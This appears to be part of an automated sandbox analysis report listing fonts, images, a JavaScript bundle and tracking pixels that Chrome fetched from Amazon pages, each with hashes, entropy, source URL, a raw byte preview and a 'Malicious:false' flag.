                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................7............~....WT{eW..N1...E.}..H.P.........=..J......0...i........}..T....P1........a.5......."t.`.Nr..z.v......y...Z(.......).]..$.l.Q"...v....+y...5.`6(.......tj~.S...y.+...]3E....O.b-...D..q.G...2`m.J.u..:f...;..:....==._....u.f...j..k.^..."2....UXf@.SG2^.Qg.. .....].%t.&nG`.......p...'...y.@..-.K....*......V....~.}i.................R..........................!1A....Qa...%045q......"$6D#&RTUe.2BPbu... (@EFdv.............?.....0.[.v.....$\\_..v......L......u.}..v.g.)UH..s...9..?k.f.d52..i.H.s$......,.n|.QH....N........U.../*..8JU.N.......:._.ak8.."P9T........T..;..f..*.4.LY(......p.....[M;pk...+..jBp.#v.._.$.G..K....U.D......G.JhE'.._h|q@.;TRz.3`.5.....'xI.."......O...H........n..V.V..>.".u.....CI..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 17336, version 1.655
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):17336
                                                                                                                                                                                                                                                                Entropy (8bit):7.986832176880709
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:e5synBGYXpmI4lCKsduXVgswk7BlSOSEtMoFr2h:usyJXpmDlgex73R1qox2h
                                                                                                                                                                                                                                                                MD5:B39E082C6B983705892045FD87E0B9A8
                                                                                                                                                                                                                                                                SHA1:9CC1BB64EB270135F1ADF3A4881C2EE5E7C37BE5
                                                                                                                                                                                                                                                                SHA-256:CB0F25CA005489D2399434C33762F291BD8746714EAE3AA72DE20ACA08EDC458
                                                                                                                                                                                                                                                                SHA-512:DDBB8B598854DD829BEFB27641B1C56F23FCE55283D3FA33F0BFDA1C3B38CE7DC03A799E84902C580BA8A54361D33A49038368C96D9FCDE6A50FE83514774D17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/WOnTLzkiaEccV7F.woff2
                                                                                                                                                                                                                                                                Preview:wOF2......C...........CS........................?FFTM..8.....@.`..~........!.6.$..F..<.. .....a?webf...5l.......?..`..0p....{..Tj....?%........X.....,..UU.o.J(x...g.HK.I..EW.....<...o.RS.,.D.[Xv.s^SW.<..Y0...@..e...t*...J$%?..BGb.axC.....hc.P...z7/.m...=!........LET.K...N....W..DOc.x~..>!...."V...D.*.v."..tQ.*t.?OG..y3.../.F..qB.%..@..\..*y.2w.7GKB..7).1..p^u...MJ...O.D......m..3..1....5..,...!..x|8Xo.y.!..A w.T...'2.M^&/''...V.D*.Hl......$..D".JeR.L*..d"t...6}.c.2.Zkx.....!A%.q...b....$XJ..SJ...01&*..X.../.@..n....o...........ow.......$.RB.7...L.Ip.........dOU.......O.w.....Y.[k[.^MR ...v...6...>.........uYZ[.-k...Y.L.@...j...../r..`g>..C..R.rw%..`...p.&q..)(.......z...-H..N....)rI%.B..C.B..K.*..u...2.E.t.g.>....?..7._....Z.~....t.'.bj.`.|M.g..fi.X..D.HU.e.Yz..t....dk.t.0...1r.R.v.E.........}....I.?.....%.T.;.`!,.o....B..^.z....b.!BB$Dd.....a}.j!.+..A.A...4"M#"..9..el......A.j..#?"...}...."..#...8k..._.x..|...c........5.H...."-..a.p.p?..b..K....~.*..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2848
                                                                                                                                                                                                                                                                Entropy (8bit):7.826999957666273
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rYvmZr9ahuWLLEbyTSENB/D/fXcGDXRKNLXb3SLtgfrhW9VpUL+3eDnS6grjJ:T1xxL9rrLcrCL+frsHjeDzaJH
                                                                                                                                                                                                                                                                MD5:81D2D0C8B309AB73803B28DB9AA59600
                                                                                                                                                                                                                                                                SHA1:574260EBA58714619C9F2D74B5CD5CF03D8B4828
                                                                                                                                                                                                                                                                SHA-256:DC11C9A719D9750BFBED6CECC13BD68BCBA9A8E2C71B376A799C497774EDA3E4
                                                                                                                                                                                                                                                                SHA-512:110B345DB4961D2F98E73922FB74F59A957A2798D380F60B485EB8C11138D7CBEEBBE49FAC9CC58C2FDD0721048174E8747E095E5BE644E075FD9F89729E78A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........L..".............................................................!1.A.."2Qaq.B..#R..34b...............................................!1.."A2q......3Qa.............?........>.x.m.}.b}_.g.^T..nY.D....<...~.O..g.$^.U4..J.r%,...)J...)@)JP...o.....>I...]..F..k...gQP6 |....~#.!..@...Rq.M\.....@..:..X...=.....`ES.r.K\Z..8.8..rH ..s.*.........C..`j.$.{..Wjv..>..#...^R....R....u+.o......m.q.$..(md.....I...=....r.....(.A....'....UF/.'..No6^.u./:.+..)....Sh...# ..pS..".f..rnm.v......Y.........v..4...e..V..J.....vQ...)V..O..........X..J....3..]...j......%....c.........4...Q[.u.b$T.(...)WX..)@Su.vIa....@.&Ys.;.w...YQ]NC......H.A#f..=.......@....}.........We[x.I.>..)J.....y.....p.J..?...x.V..ns......z..UX.ASoaduS..eS.9'.pk_Y.ug?...."..)Z..R....F...q.....s..e..T..9"...i..Y.inU..S..uis.6..FVgU...r....".
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2983
                                                                                                                                                                                                                                                                Entropy (8bit):7.806008917611666
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6M6QHLVMGyV6w2yb51+3G9wLGZvcXRdxSB4do4cSVr523u5S+uBXpjqaIP:TEyT9v+3GZkXNy4d3T2CuBZjHIP
                                                                                                                                                                                                                                                                MD5:A493C3F5A7DA59F044FCE94E196E5C97
                                                                                                                                                                                                                                                                SHA1:5CFC0D3AFF94CE5ACB1101AAEB299EA604D22963
                                                                                                                                                                                                                                                                SHA-256:EB39FC32128D6B5FD2018962121269D3362F27081D699EE7593BA522F460F633
                                                                                                                                                                                                                                                                SHA-512:1FA537F7A6358416972D84ED854E8A4BE4CC88181102A17C5BEBC074057E03FD69BF5F66A4B6EBB612ADDA42A5131D9FA64E0A77FF313EE615F4A8323C2D5371
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1A."Qaq.2....#Bb..3RSc.r..........................................................?..............~..%e.>.4....|.....%...Z.6.EjKH2....v.5......k...k......u.=......k.......6\.6O..9..M.+...h...bbt=.._..znJdU..{..:.d?"&Z." ""." ""." ""." '$B.*..d..M..1..1!.U)e.Z.+...d..u..l<K,.JD.(X..r...b*.......*=g.~..UmVe...P..S/.&.6G..J....A......O.D.c.....(.*....|7?(?...y........u.U..a;L.&..K.................6[W........._...m:.......wdc..v.h..H+.%..+S.......N.X*..@.!....$......................L..F6U$..S`*F.S.#...~....tl...c.O.y.[k,?.....u*.1-.....3W....3......".h......o......e.........f.....~.d.P.1..(. ..Q..S.a..?....=....s..p....q.4......U.....D.>...N...l4..........w...>...z...e2..p.>.uH...o.+..;....,.m.)...<."..}.._c..5....D.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11395
                                                                                                                                                                                                                                                                Entropy (8bit):7.900504506758376
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YFoKfC8FTMzA7MVHeIL4xoeGcH2zL4a4KVCK5GBQks4SzPYeV9S:u68xXGcH8L4a4KVtsez6
                                                                                                                                                                                                                                                                MD5:1BC1451C4CAC3EA83E34C2C383EEF101
                                                                                                                                                                                                                                                                SHA1:F93DFE6BA318BCC442D6C9B961E71CED93B04EF7
                                                                                                                                                                                                                                                                SHA-256:ECB2398C5D0A7E58B133C795847455150F12C20C384F94A825CBA2C0680F8B95
                                                                                                                                                                                                                                                                SHA-512:36B95A4208965CEB6A483CD4387571C4B15835AA48299733552B495EFA77FF09F0B564E9E81ED70C919DF7C5B7F19CE87C19B1AA883517FC752EE865929C504B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.....7...{.|.z.}..{.~..QgB._..,...........\W.<..O@.......y(..9.8ts.......Z.Ws...\!(......1......Z!....=.|...nU..&...u|..U..}.uh.v....'..e_....,........t.:@.....W....v....uk.Z.....~.h..`....O,.+....).....'....H.....tJ......)Wz..}p.....D............m.........U...=........|.Y\.DOJ....]!...KS.5..`........w<.........8u......'_M..[6tQ.............p.....a..5..T...G&.Q......p.....\r...9x......=.n....9pi.f.......r..H...............L\.^.E..\.J1u.-l....&....V..`...........G!....!..........*R'G".1Y..:..a..:I~|..M.g.........`.....E.C.q.H........-...b.W......#..GA-.X.|..7\<......)).1..............J...2ls.....j ...K.=-c3`........0.=..y..|..Z@.......e.........i..).h....)..Fv
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):37419
                                                                                                                                                                                                                                                                Entropy (8bit):7.937127031508407
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:8o5vu1HQZYJ6tT20eEseZDurX/U7+Y9eYe7axwIlR9q:hmK/lseZDu7UmYe7aSWRU
                                                                                                                                                                                                                                                                MD5:C2B2663B7B307CCF7E78A827952EE635
                                                                                                                                                                                                                                                                SHA1:A8895D0213035F00116B792274F7AB66B7DC6BAF
                                                                                                                                                                                                                                                                SHA-256:1B1EE3D875ABFA85284B12CC7F1DE4F265E16E45C8F7A7C385FD1C2551C2F23A
                                                                                                                                                                                                                                                                SHA-512:1E5B0A2A21FEF7C1F261DA3BB534974B2BA5AA48E5FDB4C54E33A4366EA02CE3AABF65532E5F700188800ACB66267C1ABEF64C3C3D115AFEBD2D46C4A8D1942F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*.................Ducky.......F......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E76D9EEB4FDB11EFA1089C0DB44280A6" xmpMM:InstanceID="xmp.iid:E76D9EEA4FDB11EFA1089C0DB44280A6" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="BAD84EA065AEB6F4371E8144F077EB94" stRef:documentID="BAD84EA065AEB6F4371E8144F077EB94"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................... ....+!.$...2"3*7%"0....................".........................."...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3127
                                                                                                                                                                                                                                                                Entropy (8bit):7.8097143692908055
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6AoDiNqIQ6RftdQsiZle7GUcz31VxnMpZ965j+CYHBofPRNu+Ir1o:TFSqkRFHi+71c5znMpr6EC8ofqo
                                                                                                                                                                                                                                                                MD5:F25B0E45F05F68DEE0937378F4D87492
                                                                                                                                                                                                                                                                SHA1:53F7FBD8AA2E89FE6B31F6B39565081C9FEA29AE
                                                                                                                                                                                                                                                                SHA-256:DD9BBFA7E5F17D00458B24A4A2A80F13EA466DC3FCE6670DD2FAEBEA9D602BBC
                                                                                                                                                                                                                                                                SHA-512:784FC94B89E747A4C5956C83DDE4B68A569EF4F25080C6EB7EEFD601BC5530DDC338F5BAFFDBFA8FC766D3C8B69CE5238B129024D150964C70A16D26DE9B39AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Q".ARq..#Bab.t...2r.................................................!1.A."2..Q............?....""...T. .....+...Z.)...X...kwi.XhfP.-n8.!`..Rs.0""...." ...""...." ...""........R.}.fr%..CTi...&.U]....a>.F-.w.t....m/...eV@7.v...._j.....y{H.U..T-9.....|_A?..>P.*.........y...`.#. ...b"i.9..>.6..N..............b..-;Z..B.}....Bd.....'.)Kn....Z.....'\c4...)S?..O.7.......c.Z..ru\...!.Q.".E......q.|...2..F.L{..]e.po.H.@.....n85_N..V;.{.2..h}.I..""...." ...""...." ..."'/.....0.?..F.....2Q1....Z...&.....q.RU.......D..#..L..1s...^.*..~.a..@..<.+.b.r(W.....Uwf..%.........-.."+}.....3`1/..^>..@......+..?.vYTY..C%..[b..`{.m...Wc.6.y.8j..t...w.:....t....h."....=NBZ.....(3....~..1.4L...T..Z.J0u/i......3...g nx.7>I..s59Y...@..." ...""..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):56755
                                                                                                                                                                                                                                                                Entropy (8bit):7.973406642815217
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:VtMKW43ZIHxIlLasEzXjw4jGeDZbToj4Aig1Ct5Er:NWqORyLdEzz9Qj4Aig0bEr
                                                                                                                                                                                                                                                                MD5:BE236EBEF7B0090BFFCF31A5181B1BAF
                                                                                                                                                                                                                                                                SHA1:0F52B2342A6236339EFAA5A98DCD061884CF9C91
                                                                                                                                                                                                                                                                SHA-256:338A305336D450EEEB81068B22C7A34FF69B43732EB2EDF0EDD6549F12A21416
                                                                                                                                                                                                                                                                SHA-512:FAC9572E8F750BFE0F3985CBF0290E1D5F16505ECEB1F977A1313B9B9D217A8DB7CFA21EB3FC0AABE5D3BF2F76C947B5CD8FA8384AD4A62247467B1A97249970
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986211_UAE_Budget_Store_AE_xsite_baby_essentials_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..}G.z.+......k..i\..cV...............>`..`....{/X.s.4..p....*...[...&....q..p..........:4.....+i.y.q........+l.lJ....cnp.z.*..........~..N...B6B..k........*..2w.[..a..............h.....'"................6...........?.&[.......>...........+R.... 6o.......D=..ho.[....................Jf,m...=.W.:#.5.#..|.....y5...........h..{..........0.............vK.v[.~S.C..,.s_.@5....."...D9.............c..K........0....w.......Z.07.]........'2...............?.~.]\.eXj......f..X.......ML.;M.@..(.ivc#.{..............@...xx......>3...V..|.Z3..Q.F...B.'.~.i.}..0........a./...........;|5....f.^.f.}..u.(..i....G...&"..e....S.+.....;.&=s.n_o0.._L..".~...........x..u.P..-f..=ssV...{.R..!r}...?.P.}..E.l~L.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (608)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):181147
                                                                                                                                                                                                                                                                Entropy (8bit):5.399333328109369
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:7emi3shSYWTwt9VwNSn5qPsMomEW1whuuVIZ:7Vi3scYnVwNSn5qPNomEW1wMuqZ
                                                                                                                                                                                                                                                                MD5:85831553613871261E4BCC9A3CD3ABF4
                                                                                                                                                                                                                                                                SHA1:1CFBE1157C267BD2CE19AD2F19AE4C7C198AC328
                                                                                                                                                                                                                                                                SHA-256:F159E8FFE5FC13AF167254BC6D2F1090774E5322BD3993A81A2A657D4159AA3F
                                                                                                                                                                                                                                                                SHA-512:5B45F985066EE2D47B9A7B3C713FB1EC87AA790F25ED443D4F3A9BDF32FB91A174F88F5FD6481736010546C55DDE6E7413BE9E7A01E6BF54B39FA5CEF72DE6EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:/*. regenerator-runtime -- Copyright (c) 2014-present, Facebook, Inc. -- license (MIT): https://github.com/facebook/regenerator/blob/main/LICENSE */.(function(I){var y=window.AmazonUIPageJS||window.P,p=y._namespace||y.attributeErrors,H=p?p("IdentityWebAuthnAssets",""):y;H.guardFatal?H.guardFatal(I)(H,window):H.execute(function(){I(H,window)})})(function(I,y,p){var H=function(){return function(t,y){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t)){var E=[],H=!0,b=!1,c=p;try{for(var a=t[Symbol.iterator](),e;!(H=(e=a.next()).done)&&(E.push(e.value),!y||E.length!==y);H=!0);}catch(g){b=!0,c=g}finally{try{if(!H&&a["return"])a["return"]()}finally{if(b)throw c;.}}return E}throw new TypeError("Invalid attempt to destructure non-iterable instance");}}(),t="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(p){return typeof p}:function(p){return p&&"function"===typeof Symbol&&p.constructor===Symbol&&p!==Symbol.prototype?"symbol":typeof p},ba;(function(){function E(b
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D4533%26pc%3D7460%26at%3D7460%26t%3D1723469074826%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7461
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9499
                                                                                                                                                                                                                                                                Entropy (8bit):7.892696802540585
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:10V5IGb9nDWiP9X0RNI0vFFn52xXK2WogVOsE80Ylwp9IrturFRC6Vlz:10VyGbl7P9Iy0/n52s2W7VvqY6nWtujp
                                                                                                                                                                                                                                                                MD5:B49E93036E50C1F5B6A7275AEE673DAC
                                                                                                                                                                                                                                                                SHA1:085408361B8FA626C071E393992A287F7BA2006B
                                                                                                                                                                                                                                                                SHA-256:C61716C1DD1ED5AC06F44B1CDD796CBACF0DBCCE4090E4BC4FC4029AD4F1C2C7
                                                                                                                                                                                                                                                                SHA-512:8A03265EF345620DCAE9F4FD2CBE020136F96671E2BFD78E7E1F407B87C0AA73EDA57EB573F591A2B1EC195DDBB8E6B5639548FE4C9A7F340E14F7539D1FFC3E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Prime_learn_more_same-day-delivery-440x300_en_AE.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,....".......................................................................................<.R........>d...8$...........s..r..J..*.:. .......c.....U.u\@.5..)<.. .+.8.@...k..Rx..Lq....5pu]@.5..)<.. .+.8.@..k..Z....Y.Fx.U.t..5..)>.. ..>.....................@.....0........>6........U...B.V....U...] A.dc.z..[|..]..of.4..`+....U...] T.T..j....dm..&...C..:......6:. .....Y...Fc....p..s...u\@.5..v..9....f...5:.........@.JYs.*<2v...XZ...".\.z..U...] .*g?W..W....G.....Y.&.....@.x.....w....{5..F.....t....8.:.A..5<o...] ....,...o..c.....@.....W.....fZ|.4R.....%`......`.i........~.~..0rs.....C.|..c..................#.....|4.H...<.|".@....L.m......(....[..........\..)^.......>~q....]y.y./M......k.,L.7J...............................................................z..;.s.jg..L.......6....0.0f..<c&....G
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 162x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13121
                                                                                                                                                                                                                                                                Entropy (8bit):7.9647268204949055
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:/UbgpBDS5CI9PbmNRhEzt9Jwwuyn8T4Kz:Mbg725LbcwKvy8T48
                                                                                                                                                                                                                                                                MD5:759419D17865F6F846DE52CCEDA9031C
                                                                                                                                                                                                                                                                SHA1:1D6DDB1200FF11D21C2734DDD05C32B99825A890
                                                                                                                                                                                                                                                                SHA-256:C10CE7F498E2926083FE1A5A0445E5A90F8615AC711C8FF237C64D33DEF85F6F
                                                                                                                                                                                                                                                                SHA-512:63A5894AAF3FFA9787831F1D7C641577C35CC67D54D4A5E43286C3939DB17545EB311E4C338D37683AACD340B3641A11FADBBDC72E6308E11030AC7B4DE24AA4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.."A.2BQaq.#....3Rb.....$Ss...r....4c.....................................................!1AQa..."..2q....#B....CRb...............?..z.=JD=L.^..<H.:.s....#nQt'n;..D..;.8..d+,..r.x....0...C4..J.?..2..l../.....T..#....vN..k.id..a(B....\...!^......J=..$.d.&.<h..<..(Iv`..e.....I...5..`).A2.w.I2:.....e?9..8..'S..(ms.:;......?.R5...;...*.Dj.c...X......^S._..#D}%.u....I.2....#.Z...@.1.B..7....$@L..+..p.s`...wU...6.w?...|S............;tW...e..bq.g.dn...<[L.d."O1.e.#W>.p.p...t......cv....w.\...........~T..%./..V.bh./0.8.w..Q......j(.....2.._..o./N]..q..G....W.x.I../._.k..V/....j...TKA....G~1#.=.u..Ob{.;~.}P....5ux.......w.Js........x..._qq.F....S.w..<c.o...>.t....q>&n..Q.U...X....... ..<.oO.W..?O....l\........:.......:.........Z..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):131724
                                                                                                                                                                                                                                                                Entropy (8bit):7.576128362840019
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:4/iFj4TgUMnjPrLNaODX98JPUB4slQgTYznOIzqdLPGzJ:yiBzr2JP24kRunhzA+
                                                                                                                                                                                                                                                                MD5:6E5936C0C1EE219F0612FAB50EE1918F
                                                                                                                                                                                                                                                                SHA1:443F540C8F334F2B0B8C5257C220341C7ED30002
                                                                                                                                                                                                                                                                SHA-256:582968AEB5D1795386796E42B072BAE1A40F62EEFAC36B2EFF9522F18BD41865
                                                                                                                                                                                                                                                                SHA-512:6D989BE81D37715432F6670D9634C8C2B9983574CE9A3D77B261E9A90C03E86983600435EC665CD07F715F4DFEFF236CEA19BFE10435B100C2BD2A52D0599D50
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
